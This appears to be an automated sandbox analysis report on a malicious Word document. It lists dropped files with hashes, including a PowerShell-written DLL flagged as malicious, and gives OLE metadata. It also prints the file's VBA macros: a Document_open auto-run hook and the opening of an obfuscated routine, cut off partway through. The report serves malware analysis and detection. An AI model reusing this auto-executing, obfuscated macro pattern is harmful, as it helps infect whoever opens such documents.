                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Mon Jan 25 01:03:33 2021, length=178176, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2038
                                                                    Entropy (8bit):4.523237238378091
                                                                    Encrypted:false
                                                                    SSDEEP:48:8Ck/XT3InBq/Nygz4Qh2Ck/XT3InBq/Nygz4Q/:8Ck/XLInB4z4Qh2Ck/XLInB4z4Q/
                                                                    MD5:B43DCEAE9E64A3AC5207B6182FEE8C3D
                                                                    SHA1:F89DF29AC71FE19F6809C533DF684D8D3F75F77C
                                                                    SHA-256:F348E390165667E03E79C9F0758988CD725A0E5FC2CA9E717325388BB7598896
                                                                    SHA-512:668CBC5CE71CF11F10FCD96E4C4A7520AC09366C889065AA3EDF1590A8CCF979E151ABEAE2567C4A28A69C1362F0CB8AD7AE4A83C124414E16A5C9C3434447D8
                                                                    Malicious:false
                                                                    Preview: L..................F.... ....^...{...^...{.....H.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....9Rq. .79A2GZ~1.DOC..L.......Q.y.Q.y*...8.....................7.9.a.2.g.z.s.3.g.k.k...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\210979\Users.user\Desktop\79a2gzs3gkk.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.9.a.2.g.z.s.3.g.k.k...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......210979..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):71
                                                                    Entropy (8bit):4.374361647875772
                                                                    Encrypted:false
                                                                    SSDEEP:3:M1Sc+3Lp5oknLp5omX1Sc+3Lp5ov:MYd3LjvLjad3Ljy
                                                                    MD5:E20D3E64DBBC9A3366747302AE395C52
                                                                    SHA1:6898B56131A6394B30DFE77243CDC95AE782B8FC
                                                                    SHA-256:05306690592B95A4CA2A107531C69B067E3317B4EF4BF0EB613DF56A3E962343
                                                                    SHA-512:6071D6C574C087664BCC69D39F33814872109540D1BD4DE534E76B8315ACE1C0B32FE005D8C2873FA36EE7A8EECD8526A76F8FBBB13AE2FEBBFD35B7A00992F0
                                                                    Malicious:false
                                                                    Preview: [doc]..79a2gzs3gkk.LNK=0..79a2gzs3gkk.LNK=0..[doc]..79a2gzs3gkk.LNK=0..
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSXIKQWUQAVGAKAOHWPT.temp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8016
                                                                    Entropy (8bit):3.583148193596563
                                                                    Encrypted:false
                                                                    SSDEEP:96:chQCsMqUqvsqvJCwoR4z8hQCsMqUqvsEHyqvJCworT4zkCYxHG4f8R/lUVP4Iu:cydoR4z8yFHnorT4zkm4f8Rg4Iu
                                                                    MD5:3FB26C642415D765F04BB677B376E3AA
                                                                    SHA1:E320E3D95192AAAF52B5517CE6A5C0B5F245D92E
                                                                    SHA-256:0990DD41DC52D5E61D8D8831C9887FAF976D90D9BE60CEC034715693412DFF3C
                                                                    SHA-512:5FF76DAF598B3BCDD36FE0833811C176D2145C4801417915E26F848401916A29D9EA03C0F9B7E385805AF5B24B479F50ED0DAA356506E0949739D3A2560D4AB6
                                                                    Malicious:false
                                                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                    C:\Users\user\Desktop\~$a2gzs3gkk.doc
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\Snuvw2w\V4651pz\H64C.dll
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):352816
                                                                    Entropy (8bit):4.350871771424849
                                                                    Encrypted:false
                                                                    SSDEEP:3072:CZvA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:CZ206xWgGxLxWN40PDKR/JnX2P
                                                                    MD5:E147068A449E684FE47A1220F167F61F
                                                                    SHA1:A434144E723E2FC6BED01F891172D476DC2DB1E1
                                                                    SHA-256:917620A42745392EA46380F0C1E22CF8F314040CFD528FF7AAD7FE191991BA3B
                                                                    SHA-512:4B3E1DEBCE8D57B1FFEE7A645265D8BA4E95F4B9213F7F12C8AD37D3F34A01C43C868F64DD0DD5A7AE341ACF57D5AFC69B898C433E001D16B028361E4656DACA
                                                                    Malicious:true
                                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                                    Static File Info

                                                                    General

                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm, Author: Elisa Cisneros, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 12:16:00 2021, Last Saved Time/Date: Fri Jan 22 12:16:00 2021, Number of Pages: 1, Number of Words: 4060, Number of Characters: 23145, Security: 8
                                                                    Entropy (8bit):6.70817011278778
                                                                    TrID:
                                                                    • Microsoft Word document (32009/1) 79.99%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                    File name:79a2gzs3gkk.doc
                                                                    File size:177664
                                                                    MD5:09a4d7bbb0db4003f6d6eee258f0ae48
                                                                    SHA1:b611b372dc40c114d2fb52cf967ffb9062728372
                                                                    SHA256:df5ff0dd34808825942b6b896c5129f63bc36f8fbbba7f3ce145cced467c662a
                                                                    SHA512:e46061512eb44985dd51a78274709d03c937212272cea2ad7752d686ef89fa9a866744bc735ec5e8346ab73e90764276829de8a26ab7eb1ca5ef68fa72e29ab8
                                                                    SSDEEP:3072:YwT4OUNzBgQEPcnc2kTdcrrXyQBsc0vWJVi4IrwVEYbdYPeFmfG5/+vGsPt4kohL:YwT4OUNzBgQEPcnc2tPII2k
                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                    File Icon

                                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "79a2gzs3gkk.doc"

                                                                    Indicators

                                                                    Has Summary Info:True
                                                                    Application Name:Microsoft Office Word
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:True
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:True

                                                                    Summary

                                                                    Code Page:1252
                                                                    Title:
                                                                    Subject:Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm
                                                                    Author:Elisa Cisneros
                                                                    Keywords:
                                                                    Comments:
                                                                    Template:Normal.dotm
                                                                    Last Saved By:
                                                                    Revion Number:1
                                                                    Total Edit Time:0
                                                                    Create Time:2021-01-22 12:16:00
                                                                    Last Saved Time:2021-01-22 12:16:00
                                                                    Number of Pages:1
                                                                    Number of Words:4060
                                                                    Number of Characters:23145
                                                                    Creating Application:Microsoft Office Word
                                                                    Security:8

                                                                    Document Summary

                                                                    Document Code Page:-535
                                                                    Number of Lines:192
                                                                    Number of Paragraphs:54
                                                                    Thumbnail Scaling Desired:False
                                                                    Company:
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:917504

                                                                    Streams with VBA

                                                                    VBA File Name: Tvh1u8793dltn9, Stream Size: 1109
                                                                    General
                                                                    Stream Path:Macros/VBA/Tvh1u8793dltn9
                                                                    VBA File Name:Tvh1u8793dltn9
                                                                    Stream Size:1109
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . { . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 7b 84 8f 58 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Document_open()
                                                                    VB_Creatable
                                                                    False
                                                                    Private
                                                                    VB_Exposed
                                                                    Attribute
                                                                    VB_Name
                                                                    VB_PredeclaredId
                                                                    VB_GlobalNameSpace
                                                                    VB_Base
                                                                    VB_Customizable
                                                                    VB_TemplateDerived
                                                                    VBA Code
                                                                    Attribute VB_Name = "Tvh1u8793dltn9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Cfqzsexf2_k
End Sub
                                                                    VBA File Name: Twh1gb2mpd3, Stream Size: 697
                                                                    General
                                                                    Stream Path:Macros/VBA/Twh1gb2mpd3
                                                                    VBA File Name:Twh1gb2mpd3
                                                                    Stream Size:697
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . { . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 7b 84 c2 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Attribute
                                                                    VB_Name
                                                                    VBA Code
                                                                    Attribute VB_Name = "Twh1gb2mpd3"
                                                                    VBA File Name: X1bqz0qaer43b52bf, Stream Size: 25057
                                                                    General
                                                                    Stream Path:Macros/VBA/X1bqz0qaer43b52bf
                                                                    VBA File Name:X1bqz0qaer43b52bf
                                                                    Stream Size:25057
                                                                    Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 7b 84 d9 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    fUGOALvdN,
                                                                    KgsfYDHSH
                                                                    OlVYDaAK.Range
                                                                    iVxnxGH()
                                                                    TMQhTRa,
                                                                    Until
                                                                    lMxOJUo
                                                                    htkDBkB,
                                                                    hbrLsIIaJ
                                                                    lTApi,
                                                                    WhmkB
                                                                    JRtnBYH
                                                                    KAIEzBBDB:
                                                                    axfnb
                                                                    ZFzwZcA
                                                                    OGmjSHH,
                                                                    DOUPnxsoh
                                                                    TQOflAN:
                                                                    bkUZDN
                                                                    UmQHurWB
                                                                    JltZHC
                                                                    pXPTCf(jHDSG)
                                                                    QNtsSHe()
                                                                    rZGGJBDEH
                                                                    EvkuEA
                                                                    xhcZSBIH
                                                                    imnrzOF
                                                                    (LZepVwu
                                                                    LfOAoxD,
                                                                    lTApi
                                                                    wrpigDnBA
                                                                    (lqbmGD
                                                                    wVEbaDF
                                                                    OGmjSHH
                                                                    udnviH
                                                                    njcnja
                                                                    NreFC:
                                                                    (ofBYJAJ
                                                                    ZlnBbxF.Range
                                                                    GXzgs
                                                                    bquxP
                                                                    rVJUDUKH
                                                                    KwsnJ
                                                                    (TMQhTRa
                                                                    FcotIf()
                                                                    QtjyA:
                                                                    opZGEJ
                                                                    urNCUFJBF:
                                                                    iqpwDAG
                                                                    sJtmJ
                                                                    (yNTJYEFj
                                                                    BMzteJlIE(ccUPI)
                                                                    BMzteJlIE
                                                                    FVoXJ
                                                                    UZSgXY,
                                                                    NDNfzBJJ
                                                                    wEvDIdG
                                                                    MidB$(pXPTCf,
                                                                    MidB$(zxBvQRHoF,
                                                                    TtNYEBE
                                                                    zxEzinCG
                                                                    YvQjieFc.Range
                                                                    XdfYSIXX.Range
                                                                    HoDns
                                                                    arTLjQ
                                                                    (UZSgXY
                                                                    wzAgBA
                                                                    pXRdBD()
                                                                    pzxJi
                                                                    pXPTCf()
                                                                    pxjzGA
                                                                    DLNPo(zZJyEAC)
                                                                    MidB$(bKloWCbL,
                                                                    IFmVwCk
                                                                    NelhA
                                                                    QtjyA
                                                                    pxjzGA(FKISJTLG)
                                                                    aekya
                                                                    KGTisCFg
                                                                    UBound(pXRdBD)
                                                                    yEbqhrSDE
                                                                    QNtsSHe
                                                                    EHISACDA
                                                                    pXRdBD(bDqBloVC)
                                                                    cXPNdFE()
                                                                    IeEnJ
                                                                    FcotIf
                                                                    hVgaFGj
                                                                    DLNPo
                                                                    jpCcJn()
                                                                    KAIEzBBDB
                                                                    zZJyEAC,
                                                                    cwrlb
                                                                    ooYfBGDHB
                                                                    swiEYEUA
                                                                    PRawGB
                                                                    mDUMGI
                                                                    wjnsc
                                                                    pblpJEP,
                                                                    fNBrHlEAv:
                                                                    boTEsG,
                                                                    YXZHHCaB(htkDBkB)
                                                                    QyRiIm,
                                                                    BMfqCFLcE
                                                                    tmhzE
                                                                    nnjasd,
                                                                    UBound(bIdgDIKT)
                                                                    Resume
                                                                    (lTApi
                                                                    TIdZDCk.Range
                                                                    SWSoCG:
                                                                    prgAO
                                                                    UBound(FcotIf)
                                                                    DLwSlnDF
                                                                    OfcyMA
                                                                    XxLEEC:
                                                                    IFdNKp,
                                                                    wqMdGGa()
                                                                    EFfaBWHC
                                                                    ZFzwZcA()
                                                                    (bDqBloVC
                                                                    bZSWsqlD.Range
                                                                    WEIxlI
                                                                    UBound(wqMdGGa)
                                                                    (OGmjSHH
                                                                    MidB$(wWvlxHJH,
                                                                    IFdNKp
                                                                    cxvFCyK
                                                                    MxAtNhGI
                                                                    AOSGE
                                                                    (nHiSH
                                                                    LVHhGsGJd
                                                                    ZGOfHDFZ
                                                                    wqMdGGa(ZXUkHUDE)
                                                                    BhNEmrIE:
                                                                    MidB$(YXZHHCaB,
                                                                    wFpBJBJE.Range
                                                                    fPJtR
                                                                    pblpJEP
                                                                    ScLedvBEA
                                                                    JPHDBd
                                                                    VwecCsW
                                                                    tVHJH.Range
                                                                    wWvlxHJH
                                                                    OlVYDaAK
                                                                    nHiSH,
                                                                    ooYfBGDHB.Range
                                                                    (iqpwDAG
                                                                    (mDUMGI
                                                                    JJlPCJ
                                                                    bkUZDN.Range
                                                                    NreFC
                                                                    jHDSG,
                                                                    UBound(bKloWCbL)
                                                                    yJRyW
                                                                    VwecCsW.Range
                                                                    pXPTCf
                                                                    nfGGCgIdG
                                                                    bKloWCbL()
                                                                    mDUMGI,
                                                                    qZUuB()
                                                                    (EHISACDA
                                                                    cXPNdFE
                                                                    (htkDBkB
                                                                    DwikAuvE,
                                                                    MidB$(VuThCQHH,
                                                                    iVxnxGH(yNTJYEFj)
                                                                    cXPNdFE(IFdNKp)
                                                                    EHISACDA,
                                                                    FSWADGB
                                                                    UBound(jpCcJn)
                                                                    jHDSG
                                                                    obcJwDFA
                                                                    (wJpzu
                                                                    tgyiIBI:
                                                                    KqVudsGK
                                                                    axZmGGE
                                                                    seTGCvRG
                                                                    MidB$(cXPNdFE,
                                                                    VB_Name
                                                                    wUyzGJ.Range
                                                                    ElQBeG
                                                                    oyFNHnHHI
                                                                    OaVnI
                                                                    BhNEmrIE
                                                                    aBRvB
                                                                    VcRJFFPFy:
                                                                    FJGWlF,
                                                                    (KGTisCFg
                                                                    vcpiDgaED
                                                                    nhgrV:
                                                                    ZlnBbxF
                                                                    UZSgXY
                                                                    OELBME
                                                                    OZDOK
                                                                    qjZyxC:
                                                                    (DwikAuvE
                                                                    SWiOAACq
                                                                    VFEoD
                                                                    dWLbDBA
                                                                    (WEIxlI
                                                                    fUGOALvdN
                                                                    Mid(Application.Name,
                                                                    KGTisCFg,
                                                                    (boTEsG
                                                                    MidB$(QNtsSHe,
                                                                    nSFIYBiG
                                                                    bKloWCbL(nSFIYBiG)
                                                                    YvQjieFc
                                                                    UBound(BMzteJlIE)
                                                                    ZtgGUHFGJ
                                                                    qqdsB
                                                                    YqhWFED
                                                                    KwsnJ,
                                                                    UBound(YXZHHCaB)
                                                                    ccUPI,
                                                                    CMhXU:
                                                                    BMfqCFLcE.Range
                                                                    YXZHHCaB
                                                                    wWvlxHJH(EHISACDA)
                                                                    SWSoCG
                                                                    NTrejcdK(boTEsG)
                                                                    MidB$(BMzteJlIE,
                                                                    XdfYSIXX
                                                                    xNIlBBInl
                                                                    fWUcJcE,
                                                                    ShwUGEG
                                                                    OgZqDzXrC
                                                                    NTrejcdK
                                                                    (fiGUDJCof
                                                                    dxYfn,
                                                                    UBound(pxjzGA)
                                                                    gLahNHF
                                                                    BYQeC
                                                                    (wEvDIdG
                                                                    phkpFqFCH
                                                                    rYDvv:
                                                                    tVHJH
                                                                    qjZyxC
                                                                    GOSKJ
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    (dxYfn
                                                                    tgyiIBI
                                                                    kjSGfNWH
                                                                    MSHSTFGF
                                                                    zxBvQRHoF()
                                                                    ZXUkHUDE,
                                                                    xFjGF
                                                                    NelhA:
                                                                    TVnICGBMg
                                                                    ofBYJAJ
                                                                    oTxSFKM
                                                                    iqpwDAG,
                                                                    UYxXOcIJG
                                                                    YgziIE
                                                                    rYDvv
                                                                    bZSWsqlD
                                                                    fiGUDJCof,
                                                                    VuThCQHH(DwikAuvE)
                                                                    (zxEzinCG
                                                                    DLwSlnDF.Range
                                                                    DAKdJA
                                                                    EvkuEA.Range
                                                                    bDqBloVC,
                                                                    MidB$(jpCcJn,
                                                                    wFpBJBJE
                                                                    (QyRiIm
                                                                    BeNoB
                                                                    nHiSH
                                                                    IVjOAGZe.Range
                                                                    OgZqDzXrC:
                                                                    PwelHHe
                                                                    zxBvQRHoF(LfOAoxD)
                                                                    OXSmB
                                                                    iyOuxJbS
                                                                    Gownu
                                                                    mwvhyA
                                                                    FKISJTLG,
                                                                    ZFzwZcA(WEIxlI)
                                                                    bHGFAGJ
                                                                    (SWiOAACq
                                                                    OXSmB:
                                                                    WEIxlI,
                                                                    (jHDSG
                                                                    wzeYO,
                                                                    MidB$(bIdgDIKT,
                                                                    duvyGCCDG:
                                                                    bDqBloVC
                                                                    PpRoB
                                                                    Word.Paragraph
                                                                    (fWUcJcE
                                                                    nVwvHB
                                                                    XxLEEC
                                                                    UBound(cXPNdFE)
                                                                    fWUcJcE
                                                                    dxYfn
                                                                    MidB$(DLNPo,
                                                                    TQOflAN
                                                                    (FKISJTLG
                                                                    QDRLrCD
                                                                    Content
                                                                    YgziIE,
                                                                    fEtRs
                                                                    lqbmGD
                                                                    kxpwbBJF
                                                                    UBound(QNtsSHe)
                                                                    NTrejcdK()
                                                                    (LfOAoxD
                                                                    wEvDIdG,
                                                                    TIdZDCk
                                                                    QbynDCF
                                                                    (nSFIYBiG
                                                                    iVxnxGH
                                                                    nSFIYBiG,
                                                                    SlFMhE
                                                                    yNTJYEFj,
                                                                    LfOAoxD
                                                                    MidB$(NTrejcdK,
                                                                    ccUPI
                                                                    IacBICp
                                                                    MidB$(pxjzGA,
                                                                    Mpmet
                                                                    hVgaFGj()
                                                                    cxvFCyK,
                                                                    UBound(DLNPo)
                                                                    MidB$(iVxnxGH,
                                                                    LZepVwu
                                                                    zxEzinCG,
                                                                    DwikAuvE
                                                                    UBound(iVxnxGH)
                                                                    YXZHHCaB()
                                                                    wJpzu
                                                                    JoHgzC
                                                                    dMAig
                                                                    pxjzGA()
                                                                    (cxvFCyK
                                                                    fiGUDJCof
                                                                    PDdhFK
                                                                    UBound(ZFzwZcA)
                                                                    QyRiIm
                                                                    ofBYJAJ,
                                                                    zxBvQRHoF
                                                                    wWvlxHJH()
                                                                    MidB$(hVgaFGj,
                                                                    (IFdNKp
                                                                    kjSGfNWH.Range
                                                                    DHwdFs
                                                                    pzxJi:
                                                                    UBound(qZUuB)
                                                                    XHCLGl
                                                                    Len(skuwd))
                                                                    gNcNXLsAj
                                                                    wUyzGJ
                                                                    JRtnBYH.Range
                                                                    htkDBkB
                                                                    FJGWlF
                                                                    (FJGWlF
                                                                    WfWmdXBB
                                                                    BLbjEJvG
                                                                    UBound(hVgaFGj)
                                                                    zIlZF
                                                                    fNBrHlEAv
                                                                    lqbmGD,
                                                                    fPExO
                                                                    ZXUkHUDE
                                                                    RSOyLFC
                                                                    (fUGOALvdN
                                                                    UBound(VuThCQHH)
                                                                    (ccUPI
                                                                    wqMdGGa
                                                                    jpCcJn(dxYfn)
                                                                    boTEsG
                                                                    elJkJIB
                                                                    obTyv
                                                                    (YgziIE
                                                                    OpNHJEa
                                                                    BMzteJlIE()
                                                                    pXRdBD
                                                                    FKISJTLG
                                                                    MidB$(qZUuB,
                                                                    LZepVwu,
                                                                    (ZXUkHUDE
                                                                    bKloWCbL
                                                                    Mid(skuwd,
                                                                    qZUuB(SWiOAACq)
                                                                    UBound(pXPTCf)
                                                                    jpCcJn
                                                                    (pblpJEP
                                                                    OaOIEKmCA
                                                                    yNTJYEFj
                                                                    QNtsSHe(LZepVwu)
                                                                    MidB$(pXRdBD,
                                                                    ScLedvBEA:
                                                                    MidB$(FcotIf,
                                                                    UBound(zxBvQRHoF)
                                                                    bIdgDIKT(KwsnJ)
                                                                    fFCxQGp
                                                                    (zZJyEAC
                                                                    SWiOAACq,
                                                                    Error
                                                                    wzeYO
                                                                    qZUuB
                                                                    (wzAgBA
                                                                    wJpzu,
                                                                    (wzeYO
                                                                    Attribute
                                                                    duvyGCCDG
                                                                    bIdgDIKT
                                                                    bIdgDIKT()
                                                                    nhgrV
                                                                    RSOyLFC.Range
                                                                    yktdUg
                                                                    PlllYA.Range
                                                                    MidB$(wqMdGGa,
                                                                    rVJUDUKH.Range
                                                                    DLNPo()
                                                                    Function
                                                                    UBound(wWvlxHJH)
                                                                    zZJyEAC
                                                                    MidB$(ZFzwZcA,
                                                                    IVjOAGZe
                                                                    PlllYA
                                                                    VuThCQHH()
                                                                    (KwsnJ
                                                                    CMhXU
                                                                    zkqnNAIz
                                                                    VuThCQHH
                                                                    tsgajz
                                                                    wzAgBA,
                                                                    nnjasd
                                                                    FcotIf(lqbmGD)
                                                                    hVgaFGj(lTApi)
                                                                    VcRJFFPFy
                                                                    UBound(NTrejcdK)
                                                                    urNCUFJBF
                                                                    skuwd
                                                                    TMQhTRa
                                                                    VBA Code
                                                                    Attribute VB_Name = "X1bqz0qaer43b52bf"
Function Cfqzsexf2_k()
   GoTo duvyGCCDG
Set IacBICp = IFmVwCk
    Dim wzeYO, ZXUkHUDE, dWLbDBA As Long
    Dim bZSWsqlD As Word.Paragraph
    Dim wqMdGGa() As Byte
    For Each bZSWsqlD In Tvh1u8793dltn9.Paragraphs
        wqMdGGa = bZSWsqlD.Range
        dscc = "sadsaccc" & bZSWsqlD.Range
